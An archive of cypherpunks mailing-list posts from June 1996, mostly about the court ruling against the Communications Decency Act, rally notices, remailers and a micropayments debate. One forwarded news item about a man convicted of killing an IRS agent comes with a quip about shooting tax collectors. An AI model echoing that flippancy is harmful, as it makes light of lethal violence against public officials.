NEW YORK RALLY 
WHERE:    Outernet, Inc. (bway.net) @ 626 Broadway, Suite 3-A (third floor)
          (Very close to the Broadway/Lafayette stop on the F train)
WHO:      You and your friends!  Show up, bring friends, and come find
          out how net free speech fared in court.  Here is the current
          speaker list (subject to time, travel, and availability)
                U.S. Representative Jerrold Nadler (D-NY)
                Barry Steinhardt, American Civil Liberties Union (ACLU)
                Danny Weitzner, Center for Democracy and Technology (CDT)
                David Sobel, Electronic Privacy Information Center (EPIC)
                Molly Ker, Echo Communications (echonyc.com)
                Jonathan D. Wallace, author, "Sex, Laws, and Cyberspace"
                Alexis Rosen, Public Access Networks (panix.com)
                Ian Stevelman, Outernet (bway.net)

WHEN:     6:30pm, Wed June 12th, 1996.  Bring yourself, lots of friends,
          and whistles, drums, anything to make a lot of noise with.
MORE INFO:Check http://www.vtw.org/speech or http://www.bway.net/
          Press inquiries should go to Shabbir @ 917 978 8430.  Outernet's
          phone number is 212-982-9800.

PITTSBURGH RALLY 
WHERE:    Steps of the Oakland branch of the Carnegie Library
WHO:      You and your friends!  Show up, bring friends, and come find
          out how net free speech fared in court.
WHEN:     4pm, Wed June 12th, 1996.  Bring yourself, lots of friends,
          and whistles, drums, anything to make a lot of noise with.
MORE INFO:Check http://www.envirolink.org/.  Press inquiries should go
          to 412-683-6400.

----------------------------------------------------------------------------
PRESS INFORMATION

Press inquiries about the New York rally should be directed to Shabbir
J.  Safdar (VTW) at 718-596-2851.  To find out about outlets and
electricity for the rally, or to setup cameras ahead of time, contact
Ian @ Outernet at 212-982-9800.

============================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lauren Amy Gelman <gelmanl@gwis2.circ.gwu.edu>
Date: Thu, 13 Jun 1996 06:26:01 +0800
To: "Harry S. Hawk" <habs@warwick.com>
Subject: Re: Court Blocks CDA
In-Reply-To: <199606121202.IAA12765@cmyk.warwick.com>
Message-ID: <Pine.SOL.3.93.960612102606.5268A-100000@gwis2.circ.gwu.edu>
MIME-Version: 1.0
Content-Type: text/plain



>From CNN web site:

U.S. court blocks Internet indecency law 

June 12, 1996
Web posted at: 8:56 a.m. EDT

PHILADELPHIA (Reuter) - A special U.S. court panel on Wednesday
issued a preliminary injuction blocking as unconstitutional a new law
prohibiting the distribution of indecent material that would be
accessible
to children over the Internet and other computer networks. 

"As the most participatory form of mass speech yet developed, the
Internet deserves the highest protection from government intrusion," the
three-judge panel said in its decision released Wednesday. 

The case involves the Communications Decency Act signed into law by
President Clinton on Feb.
8. 

The law punishes the distribution to minors of obscene or indecent
material over the Internet or
commerical online services with fines and up to two years in prison. 

The American Civil Liberties Union filed the suit against the Justice
Department the same day the
measure became law. The suit was combined with a separate action
undertaken by major online
services and software giant Microsoft Corp. 

Opponents say the bill is unconstitutional, unenforceable and would
drastically curtail what they
said is the highly democratic nature of speech in "cyberspace." But the
U.S. government said the
law was essential to shield children who have easy access to a growing
amount of pornography
online. 


On Wed, 12 Jun 1996, Harry S. Hawk wrote:

> 
> CNN reports court blocks CDA
> 
> -- 
> Harry Hawk,     Manager of Interactive Communications
>                 Warwick Baker & Fiore,  212 941 4438,     habs@warwick.com
> 
> The Internet has the potential to set us free -- to learn anything and
> do anything, whenever we want. No wonder politicians want to regulate
> it -- The Washington Post, November 7, 1995, p. A13., Cyber Liberation
> [Column], James K. Glassman
> 



----------------------------------------------------------------------------
----------------------------------------------------------------------------
Lauren Amy Gelman				gelmanl@gwis2.circ.gwu.edu
George Washington University			gelman@epic.org
Science, Technology, and Public Policy Program	gelman@acm.org





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 13 Jun 1996 06:39:07 +0800
To: cypherpunks@toad.com
Subject: No Kidding
Message-ID: <2.2.32.19960612144312.00756e88@popserver.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


E.  Conclusion

          Cutting through the acronyms and argot that littered
the hearing testimony, the Internet may fairly be regarded as a
never-ending worldwide conversation.  The Government may not,
through the CDA, interrupt that conversation.  As the most
participatory form of mass speech yet developed, the Internet
deserves the highest protection from governmental intrusion.
          True it is that many find some of the speech on the
Internet to be offensive, and amid the din of cyberspace many
hear discordant voices that they regard as indecent.  The absence
of governmental regulation of Internet content has unquestionably
produced a kind of chaos, but as one of plaintiffs' experts put
it with such resonance at the hearing:
               What achieved success was the very
               chaos that the Internet is.  The
               strength of the Internet is that
               chaos.[23]

Just as the strength of the Internet is chaos, so the strength of
our liberty depends upon the chaos and cacophony of the
unfettered speech the First Amendment protects.
          For these reasons, I without hesitation hold that the
CDA is unconstitutional on its face.

               IN THE UNITED STATES DISTRICT COURT
             FOR THE EASTERN DISTRICT OF PENNSYLVANIA

AMERICAN CIVIL LIBERTIES UNION,  :   CIVIL ACTION
et al.                           :
                                 :
         v.                      :
                                 :
JANET RENO, Attorney General of  :
the United States                :   NO. 96-963

________________________________________________________________

AMERICAN LIBRARY ASSOC.,        :    CIVIL ACTION
INC., et al.                    :
                                :
        v.                      :
                                :
UNITED STATES DEP'T OF          :
JUSTICE, et al.                 :    NO. 96-1458

                               ORDER
          AND NOW, this 11th day of June, 1996, upon
consideration of plaintiffs' motions for preliminary injunction,
and the memoranda of the parties and amici curiae in support and
opposition thereto, and after hearing, and upon the findings of
fact and conclusions of law set forth in the accompanying
Adjudication, it is hereby ORDERED that:
          1.   The motions are GRANTED;
          2.   Defendant Attorney General Janet Reno, and all
acting under her direction and control, are PRELIMINARILY
ENJOINED from enforcing, prosecuting, investigating or reviewing
any matter premised upon:
               (a)  Sections 223(a)(1)(B) and 223(a)(2) of the
Communications Decency Act of 1996 ("the CDA"), Pub. L. No. 104-
104, § 502, 110 Stat. 133, 133-36, to the extent such
enforcement, prosecution, investigation, or review are based upon
allegations other than obscenity or child pornography; and
               (b)  Sections 223(d)(1) and 223(d)(2) of the CDA;
          3.   Pursuant to Fed. R. Civ. P. 65(c), plaintiffs need
not post a bond for this injunction, see Temple Univ. v. White,
941 F.2d 201, 220 (3d Cir. 1991), cert. denied sub nom. Snider v.
Temple Univ., 502 U.S. 1032 (1992); and
          4.   The parties shall advise the Court, in writing, as
to their views regarding the need for further proceedings on the
later of (a) thirty days from the date of this Order, or (b) ten
days after final appellate review of this Order.

                           BY THE COURT:

                          ______________________________
                          Dolores K. Sloviter, C.J.
                          U.S. Court of Appeals
                          For the Third Circuit

                          ______________________________
                          Ronald L. Buckwalter, J.

                          ______________________________
                          Stewart Dalzell, J.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 13 Jun 1996 06:26:34 +0800
To: cypherpunks@toad.com
Subject: Full Text of CDA Decision is up
Message-ID: <2.2.32.19960612144736.0076b240@popserver.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


http://www.cdt.org/ciec/decision.txt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vin@shore.net (Vin McLellan)
Date: Thu, 13 Jun 1996 06:35:45 +0800
To: Dale Drew <ddrew@mci.net>
Subject: <noise> Terrorism Hysteria on the Net
Message-ID: <v02140b00ade48b170eb9@[198.115.179.222]>
MIME-Version: 1.0
Content-Type: text/plain


Oppps!  Sorry Drew, I think I misrepresented you and incorrectly cited you
in reference to snow's comment that the "potential for economic terrorism
is not significantly larger given the existance of the Internet than it was
before."

Appologies to both of you.

         Vin McLellan +The Privacy Guild+ <vin@shore.net>
      53 Nichols St., Chelsea, Ma. 02150 USA Tel: (617) 884-5548
                         <*><*><*><*><*><*><*><*><*>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 13 Jun 1996 07:03:25 +0800
To: cypherpunks@toad.com
Subject: Kaos vs Control
Message-ID: <2.2.32.19960612150802.0076e2bc@popserver.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


With apologies to Maxwell Smart...

Note the most important part of the decision.  The embrace of chaos by the
Chief Judge of the 3rd Circuit Court of Appeals:

"Just as the strength of the Internet is chaos, so the strength of
our liberty depends upon the chaos and cacophony of the
unfettered speech the First Amendment protects.
          For these reasons, I without hesitation hold that the
CDA is unconstitutional on its face."

Chaos wins again.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 13 Jun 1996 10:21:10 +0800
To: cypherpunks@toad.com
Subject: Re: Kaos vs Control
Message-ID: <ade4591802021004aba9@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:08 PM 6/12/96, Duncan Frissell wrote:
>With apologies to Maxwell Smart...

(And to SMERSCH, "Death to Censors")

>Note the most important part of the decision.  The embrace of chaos by the
>Chief Judge of the 3rd Circuit Court of Appeals:
>
>"Just as the strength of the Internet is chaos, so the strength of
>our liberty depends upon the chaos and cacophony of the
>unfettered speech the First Amendment protects.
>          For these reasons, I without hesitation hold that the
>CDA is unconstitutional on its face."
>
>Chaos wins again.


See, all you doubters, "anarchy" is not so bad after all.

(Politically aware people of various stripes fully understood the precise
meaning of "anarchy," and anarchy of various types (anarcho-capitalism,
anarcho-syndicalism, etc.) is well-known. The _popular_ impression of
anarchy-- images of bomb-throwing Russians or Bloods and Crips street
battles--is less charitable. I see little chance that people who don't
understand anarchy derives from "an-archy," "no top/leader/highest level,"
will become educated.)

Kevin Kelly's "Out of Control" makes the chaos/anarchy/self-organization
points in a different way, as do the works of Hayek, D. Friedman, and many
others.

Good to see the courts reaffirming that "chaos" and lack of control by
authorities is a core part of the U.S. system. Maybe the control freaks of
Europe and Asia who have been charting their own authoritarian courses will
give more thought to ensuring liberty even if it more "chaos."

Today is a good day.

--Tim

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Thu, 13 Jun 1996 07:51:11 +0800
To: Scott Schryvers <schryver@radiks.net>
Subject: Re: [Tiny bit o noise] was Re: Terrorism Hysteria on the net
In-Reply-To: <199606120655.BAA07112@sr.radiks.net>
Message-ID: <Pine.SUN.3.91.960612120732.29559B-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


Give me $1,000,000,000 and I'll buy every household in the United States a 
pizza. Whilst everyone is sitting down arguing about toppings, we'll take 
to the streets and seize power.

Poit!

---
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | Email address remains unchanged
You're my firewall -    	      | ........First in Usenet.........




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 13 Jun 1996 12:56:31 +0800
To: cypherpunks@toad.com
Subject: Re:  No Kidding
Message-ID: <199606121914.MAA09944@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


> The absence
> of governmental regulation of Internet content has unquestionably
> produced a kind of chaos, but as one of plaintiffs' experts put
> it with such resonance at the hearing:
>                What achieved success was the very
>                chaos that the Internet is.  The
>                strength of the Internet is that
>                chaos.[23]
> 
> Just as the strength of the Internet is chaos, so the strength of
> our liberty depends upon the chaos and cacophony of the
> unfettered speech the First Amendment protects.

This is beautifully eloquent.  I hope it will be persuasive with the
Supreme Court.

Does anyone know which witness came up with the quote above?  Obviously
it resonated with the judges.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: samlb@baynetworks.com (Sam Bassett (C))
Date: Thu, 13 Jun 1996 10:56:07 +0800
To: cypherpunks@toad.com
Subject: Born Classified
Message-ID: <199606121924.MAA07982@samsparc2.baynetworks.com>
MIME-Version: 1.0
Content-Type: text/plain


	According to "The Codebreakers" (if memory serves me), in about 1943
the U.S. and the U.K. negotiated a BRITUS treaty, the details of which were
very secret.  I think that this was the original agreement to share the
British Enigma cryptography results, and possibly the U.S. nuclear results.
	Further, I suspect that one of the provisions of the BRITUS treaty
was that all of the crypto stuff be treated as if British Law (i.e. the
Official Secrets Act) ruled -- everything was secret unless and until the Government said it wasn't any more.
	This was mildly unconstitutional at the time, but could be gotten past
the courts on the excuse that the Constitution defines treaties as "The Highest
Law of the Land".  It has certainly led to a lot of abuses since, but the
bureaucrats love it -- "born classified", indeed!

	Does anyone on the list have any info -- or references -- that would
serve to confirm or deny my guesses?

adTHANKSvance

samlb@baynetworks.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 13 Jun 1996 13:22:51 +0800
To: Deranged Mutant <WlkngOwl@unix.asb.com>
Subject: Re: Encrypting forwarding service?
In-Reply-To: <199606121226.IAA24371@unix.asb.com>
Message-ID: <Pine.GUL.3.93.960612123144.7207C-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 12 Jun 1996, Deranged Mutant wrote:

> Such a service can be set up at a site with *lots* of keys given to 
> it.  This way if one wants to spontaneously send a message to someone 
> that she doesn't have a key for, she can use the service.  (Perhaps 
> the service would only accept or forward mail from/to people who 
> submitted their keys, and possibly eca$h... it could also bounce 
> messages back, re-encrypted, if there's a failure...)
> 
> This could be used like anonymous remailers to foil traffic analysis, 
> but also for people who, in certain situations, don't want/need 
> anonymitiy with the person they are corresponding with, and who don't 
> necessarily have keys handy.

US/Canada residents only might want to look at:

 http://www.portal.com/~hfinney/java/pgpmail/PGPMailer.html

Of course it should be accessible through anonymous proxies.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ecafe Mixmaster Remailer <mixmaster@remail.ecafe.org>
Date: Thu, 13 Jun 1996 01:00:07 +0800
To: cypherpunks@toad.com
Subject: Hackerpunks and C2
Message-ID: <199606121255.MAA03340@avignon.hypereality.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


There was a minor error in my earlier post. If someone were to notice a
node on the internet receiving a bag with L(In)=L(Posted) *before* any
other nodes on the internet, then one could guess that node had a user who
was the owner of Hackerpunks.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@communities.com (Jim McCoy)
Date: Thu, 13 Jun 1996 10:52:59 +0800
To: cypherpunks@toad.com
Subject: Re:Anonymous remailers mentioned in CDA decision
Message-ID: <v02140b00ade4df66918c@[205.162.51.35]>
MIME-Version: 1.0
Content-Type: text/plain


Raph quotes a few bits of the CDA decision:
[..]
> 22. Arguably, a valid CDA would create an incentive for overseas
> pornographers not to label their speech. If we upheld the CDA,
> foreign pornographers could reap the benefit of unfettered access
> to American audiences.  A valid CDA might also encourage American
> pornographers to relocate in foreign countries or at least use
> anonymous remailers from foreign servers.

It about jobs, that's it...  Let's keep America a major power
in the pornography industry (I can just imagine the commercial :)

jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 13 Jun 1996 14:05:14 +0800
To: "Stephan Vladimir Bugaj" <stephan@studioarchetype.com>
Subject: Re: Micropayments are Crap
In-Reply-To: <v03006f00ade3a25564ae@[204.162.75.169]>
Message-ID: <199606122005.NAA19329@netcom15.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



it seems to me many of mr. Bugaj's complaints refer to the
deficiencies of a capitalist market, such as scams, greedy
companies, etc. he seems to think micropayments may exacerabate
this problem. in any case I agree there are problems with
capitalism, but I think micropayments may have the effect
of ameliorating some of the deficiencies. 

today we have payment systems that are "blocky" or have
"large granularity". many companies function as billing
services. in other words, they sell some product, and would
rather not get into the payment collection business, but the
economics of scale forces them to. the phone company is
forced to send out mail and have a zillion clerks to handle
the returned bills. the country is awash in checks and 
paperwork. I can easily make a good case that micropayments
may have a significant dent in this paradigm such that
companies can focus more on providing services than collecting
cash. the dividends would be obvious and enormous.


I'll skip most responses and focus on a few in particular..

>>somewhat. mainframes aren't totally the mark of the devil. don't you pay
>>your internet provider per hour? how many people do? isn't a Sun pretty
>>
>No, I don't.  I use it too much, so I found an ISP that does not charge metered
>rates.  A lot of people pay by the hour for their ISP, but it may or may not
>be a wise idea for them.  If it's part of their work and they're online all the
>time, they should consider another payment system.  Same thing with charging
>micropayments for using software.  If Adobe started charging me $5/hr to use
>Photoshop instead of $500 for the package, I'd stop using photoshop.  In two
>weeks I'd have already exceeded the price of the whole package.

again, you are making arbitrary assumptions. the figures you cite
are "straw men". OF COURSE micrompayments make no sense if you end
up spending more money. I totally agree with you there, who could
argue? all the micropayment proponents are starting from the
assumption that services you now pay for could be cheaper given
the micropayment model. you seem to think that micropayments mean,
"companies have more opportunity to shaft you". but equally perhaps,
it is more opportunity for the consumer to exercise control with
less at stake.

>
>>much equivalent/similar in processing power & capability to old mainframes?
>>you raise all kinds of objections that make no sense to me.
>>
>Sure it's the same power as an old mainframe.  Big deal.  What exactly does
>that
>do to stregnthen your argument?  It's certainly not as costly to build, costly
>to maintain, or rare as old mainframes...

alright, your mainframe idea is way off for several reasons. first, the
mainframe is not dead, it has just been transformed into Sun and Unix
boxes all over the planet. so even if a system was "like a mainframe",
I wouldn't consider that the mark of the beast as you suggest. furthermore,
mainframes are about CENTRALIZATION. imagine a single computer like
Prodigy that was the bottleneck through which you got all your software
over the net. ok, that would be horrible. it would also be like the
mainframe concept you are criticizing.

but micropayments are not about centralization, they are about 
DISTRIBUTION. imagine a zillion software providers all over the planet.
each can meter you out software at a tiny fee per time. this is 
clearly not like a centralized mainframe situation at all, assuming you can get
similar software from a zillion different places.  it *is* similar
in that you are grabbing cpu cycles from outside your computer, but
this is arguable just a network. mainframes used networks too. does
that make networks evil? no, I don't think so!! surely you are in
favor of networks!!

>>uh huh. what if over your lifetime it cost far less than you pay for
>>a shinkwrapped package?
>>
>If that happened, I'd be very suprised.

that's the kind of savings people who promote micropayments are betting
on. again, I agree that if the consumer ends up paying more in some
way with micropayments, they're doomed to never get off the ground.

>That is a good advantage, you are correct in this.  But there are a number of
>instances in which I'd still want software running on a real workstation.  If
>people make software only available through micropayments, then that would be
>limiting to both the user and the vendor.

as I wrote, I don't believe micropayments are going to be the only
form of transaction in the future. surely nobody else is advocating this
either.

>In some ways.  But those of use who use certain packages heavily would get
>shafted for our loyal support of a vendor if they decided to pander to the
>skittish masses and charge a rate that was psychologically more appealing
>to
>those who wouldn't otherwise use it.  I only hope that vendors who choose to
>use micropayments (since they're inevitable) take the small but loyal power
>user segment into consideration when making the decision about whether or not
>to stop selling full packages altogether.

I imagine that people will have a wide variety of ways to use the software
they want to use. every company that sells software has a lot of plans
right now. I'm sure that micropayments would only be one other way
for the consumer to pay for what he uses. they may become preferrable
in some cases where both the company and consumer agree they are 
benefitting. but companies that shaft their customers, which you seem
to be preoccupied with, imho ultimately go the way of the dodo bird.

>The best model is not the mainframe model promoted by the idea of the "internet
>computer" (aka. Mutant X-Terminal), but a truly distributed system.
>Workstations and PCs can contribute their substantial processing power to a
>distributed system.  The other problem I have with the mainframe model and
>centralized resources is storage.  It's bad enough to have to wait in line for
>a CPU, but the idea of having no direct access to my work is unappealing,
>and for a number of industries impossible.  I doubt designers, for example,
>would
>be willing to leave client work on the big Illustrator server cluster at Adobe.
>Fat pipes connecting fast PCs to even faster servers is the best route.

notice that if you have a zillion mainframes all over the planet, each
one that can serve you, the idea of a mainframe is not all that bad.
what you are really opposing is *bottlenecks*, such as a zillion
people needing one mainframe. I agree the system
must be carefully designed to avoid them.

>>
>I was looking at this from a vendor viewpoint in this particular instance.  The
>TV old guard may not be willing to give up all that big, fat (and reliable) ad
>revenue to the whim of John and Jane Q. Tvwatcher.

neither was the catholic church willing to give up their monopoly
on bible interpretation when the printing press was invented. my
comment is, "yeah, so what?" or perhaps "now you GET IT!! hee, hee"

>Yeah, but the old tends to cling on for dear life.  Welcome to the concept
>of people and institutions that are unwilling to change and do their best to
>postpone those changes.

it will happen, I agree. that's why reality can be so entertaining.
once certain people recognize what micropayments really imply, they
will be aghast like the scientologists are right now. really, I
predict that when you combine all the following:

1. micropayments
2. web technology
3. distributed computing

in a fully seamless and refined way, you are going to have an
entirely new economic system. it will come close to the realization
of Toffler's 3rd wave "information economy". I mean literally, our
economy will be tied in and tightly coupled with cyberspace. when
you put all this together it will make the current web revolution
look like bland corn flakes in comparison.

>That's not infeasable.  I didn't say anything was infeasable, I just think
>some of the current models of how things might work are bad ideas and encourage
>debate.  Both consumers and resistant old-school vendors will have issues to
>address, and ramming change down people's throats because it's inevitable or
>'the market dictates it' is a crappy attitude which I don't encourage. 

an oxymoron. by my definition, "ramming something down someone's throat"
implies the market is opposing it, or at least not openly encouraging it.
I'm all for not ramming anything down anyone's throat. I've been
advocating consumer choice. it won't catch on unless it really is better
than what we have now. it won't solve all problems, but it will
solve some.

your message contains a lot of FUD that is associated with any new
technology. once people play with it, they don't get so upset. there
was a lot of anxiety about the "information superhighway" for a long
time among people I knew. but then they discovered they could surf
the whole internet by just clicking a mouse. wheeeee!! if the
insanely neurotic "cathy" in the comic strips can handle the internet,
then *anyone* can. <g>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Thu, 13 Jun 1996 03:36:12 +0800
To: "Keith D. Anthony - NAIC/TATA - 513-257-6351" <kda36@mailhubu.naic.wpafb.af.mil>
Subject: New NRC Report Site
Message-ID: <199606121316.NAA08789@pipe2.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Keith, 
 
 
The entire Web site hosting the NRC report was nuked by an alien or angel
yesterday. Another site is in preparation and we will announce it on
c'punks as soon as it is ready, probably later today. 
 
 
John




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lroth@ios.com (by way of Duncan Frissell <frissell@panix.com>)
Date: Thu, 13 Jun 1996 10:32:23 +0800
To: cypherpunks@toad.com
Subject: Republican Revolution?
Message-ID: <2.2.32.19960612184410.0076ea34@popserver.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Now that Internet Kaos!!! has been legalized, I guess it's OK to post this.

To paraphrase Lazarus Long "Avoid strong drink.  It might make you shoot at
tax collectors outside of New York State."  Love those soft and squishy judges.

>From the NY Post, Wednesday, June 12, 1996.

CONVICTION OF TAX MAN'S KILLER GETS TOSSED OUT

By Gregg Birnbaum
Post Correspondent

ALBANY --- The state's top court yesterday threw out the murder conviction
of a Republica Party activist who gunned down the first IRS agent to die in
the line of duty.

The court of Appeals overturned the 1983 conviction of James Bradley, who
asked IRS collection agent Michael Dillon, "Mike are you prepared to meet
your maker?" --- then fired an M-1 rifle at him twice.

Bradley then knelt down to take Dillon's pulse and shot him a third time
before driving to a friend's house to present him with the weapon as a
"souvenir."

Dillon 61, had gone to Bradley's house near Buffalo in September 1983 to
collect the last $332 of a $2,000 lien imposed by the IRS.

When Bradley wouldn't pay up right away, Dillon threatened to seize one of
his cars.  Bradley got his rifle, returned to the kitchen, where Dillon was
sitting and started firing.

In a unanimous unsigned ruling, the Court of Appeals said the trial judge
undermined Bradley's insanity defense by improperly allowing the jury to
also consider a first-degree manslaughter conviction.

That's the charge on which Bradley was convicted.  He was acquitted of
second-degree murder.

At his sentencing, Bradley predicted Dillon wouldn't be the last IRS agent
to die at the hands of an irate taxpayer and said, "I was just helping
President Bonzo get government off our backs," an apparent reference to
then-President Reagan.

The Erie County district attorney said he expected to resubmit the case to a
grand jury.  If Bradley is tried again, he will face a first-degree
manslaughter charge or lesser, his lawyer said.

Before the shooting, Bradley, 76, had long been known as a Republican
campaign worker in the Buffalo area.  He is now in the Mohawk Correctional
Facility in Rome and is said to be ill.

###











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "strick (henry strickland)" <strick@versant.com>
Date: Thu, 13 Jun 1996 12:39:24 +0800
To: cypherpunks@toad.com
Subject: 121. Anonymity is important to Internet users who seek
Message-ID: <9606122232.AA03825@vp.versant.com>
MIME-Version: 1.0
Content-Type: text/plain


>From the CDA decision:     ( http://www.vtw.org/speech/decision.html )



				     Anonymity

		  121. Anonymity is important to Internet users who seek

	to access sensitive information, such as users of the Critical

	Path AIDS Project's Web site, the users, particularly gay youth,

	of Queer Resources Directory, and users of Stop Prisoner Rape

	(SPR).  Many members of SPR's mailing list have asked to remain

	anonymous due to the stigma of prisoner rape.




Anonymous remailers are mentioned in this secction:




		   Obstacles to Age Verification on the Internet



		  90.  There is no effective way to determine the

	identity or the age of a user who is accessing material through

	e-mail, mail exploders, newsgroups or chat rooms.  An e-mail

	address provides no authoritative information about the

	addressee, who may use an e-mail "alias" or an anonymous

	remailer.  There is also no universal or reliable listing of e-

	mail addresses and corresponding names or telephone numbers, and

	any such listing would be or rapidly become incomplete.  For

	these reasons, there is no reliable way in many instances for a

	sender to know if the e-mail recipient is an adult or a minor.

	The difficulty of e-mail age verification is compounded for mail

	exploders such as listservs, which automatically send information

	to all e-mail addresses on a sender's list.  Government expert

	Dr. Olsen agreed that no current technology could give a speaker

	assurance that only adults were listed in a particular mail

	exploder's mailing list.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian A. LaMacchia" <bal@martigny.ai.mit.edu>
Date: Thu, 13 Jun 1996 11:18:37 +0800
To: hfinney@shell.portal.com
Subject: Re: No Kidding
In-Reply-To: <199606121914.MAA09944@jobe.shell.portal.com>
Message-ID: <199606121958.MAA17577@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Wed, 12 Jun 1996 12:14:15 -0700
   From: Hal <hfinney@shell.portal.com>
   Sender: owner-cypherpunks@toad.com
   Precedence: bulk

   > The absence
   > of governmental regulation of Internet content has unquestionably
   > produced a kind of chaos, but as one of plaintiffs' experts put
   > it with such resonance at the hearing:
   >                What achieved success was the very
   >                chaos that the Internet is.  The
   >                strength of the Internet is that
   >                chaos.[23]
   > 
   > Just as the strength of the Internet is chaos, so the strength of
   > our liberty depends upon the chaos and cacophony of the
   > unfettered speech the First Amendment protects.

   This is beautifully eloquent.  I hope it will be persuasive with the
   Supreme Court.

   Does anyone know which witness came up with the quote above?  Obviously
   it resonated with the judges.

This quote was from the end of Scott Bradner's recross on March 22.
Here's the excerpt from the trial transcript:

[page 166]
    25                    JUDGE DALZELL:  And indeed, isn't the whole point

[page 167]
     1           that the very exponential growth and utility of the Internet
     2           occurred precisely because governments kept their hands out
     3           of this and didn't set standards that everybody had to
     4           follow?

     5                    THE WITNESS:  Well, it's actually even a little bit
     6           more contorted than that because the governments tried to. 
     7           The U.S. Government and many other governments attempted to
     8           mandate a particular kind of protocol to be used on worldwide
     9           data networks, and this is the OSI protocol suite.  The U.S.
    10           Government mandated its use within the U.S. Government and
    11           with purchasing material with U.S. funds.  This was mandated
    12           in many European countries and in Canada and many other
    13           places around the world.
    14                    That particular suite of protocols has failed to
    15           achieve market success.  What achieved success was the very
    16           chaos that the Internet is.  The strength of the Internet is
    17           that chaos.  It's the ability to have the forum to innovate. 
    18           And certainly a strong standards environment fights hard
    19           against innovation.

					--bal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Thu, 13 Jun 1996 04:39:09 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: Micropayments are Crap
In-Reply-To: <Pine.SUN.3.91.960611181936.27362E-100000@tipper.oit.unc.edu>
Message-ID: <199606121429.QAA14198@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Simon Spero wrote something like:
>
>  Micropayments allow each author to be her own wire-service. _This_ will 
> be the triggering point for the new media. These services can be combined 
> into edited newspapers without the editors needing to set up complex 
> traditional arrangements (I'd pay for John Young's Daily News :)
> 
> Freedom of the Press belongs to those who own the vending machines


There are three things necessary for the New Media Paradigm to
take full effect:

1.  Many-to-many connectivity.  Check.  (infinite bandwidth blah
   blah..)
2.  Micropayments.  Coming soon to an electronic wallet near you.
   (Ecash(tm), bearer bonds, cheap tokens, coupons, blah blah..)
3.  New ratings systems.  Um...  Well, it would be easy to do 
   but few people seem to have really caught on to it yet.  
   I remain hopeful that it will come to pass as millions more
   come on-line and cetera.  I suppose having a certificate
   standard and a public key authentication infrastructure might
   help, although I secretly suspect that the good ole' Web O
   Trust would be sufficient for this purpose.  (After all, you
   only really take ratings from people you know, right?  Or
   people who have a "reviews" column in your local newspaper.)


Of course, despite all of our fond techno-utopian daydreams,
there is no telling whether this New Media Paradigm with its
absolute freedom-of-the-press and its free (or at least cheap)
presses is going to be good or bad for the current pop-culture
millionaires and the ugly tripe that they peddle.


Bryce

#include <stddisclaimer.h> /* Not speaking for anyone else at this time. */
- ----- BEGIN GOODTIMES VIRUS INNOCULATION -----
Once you have read and understood this .sig, you are immune 
to the Good Times virus.  Please help spread this innoculation!
- ----- END GOODTIMES VIRUS INNOCULATION -----




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMb7UQkjbHy8sKZitAQGg/wL/SDjAXkMH+pwwMIUONtXaWxDAMjNose0R
BCfQxFhTMqUUl1JwbYaX61X/L3ckm9/83+3uuFNeT/x/dsKcmIhVmalTBobdEWPV
XbvI/fsokUY0lahjmbgcsR0EmriS+F5L
=+T9Y
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
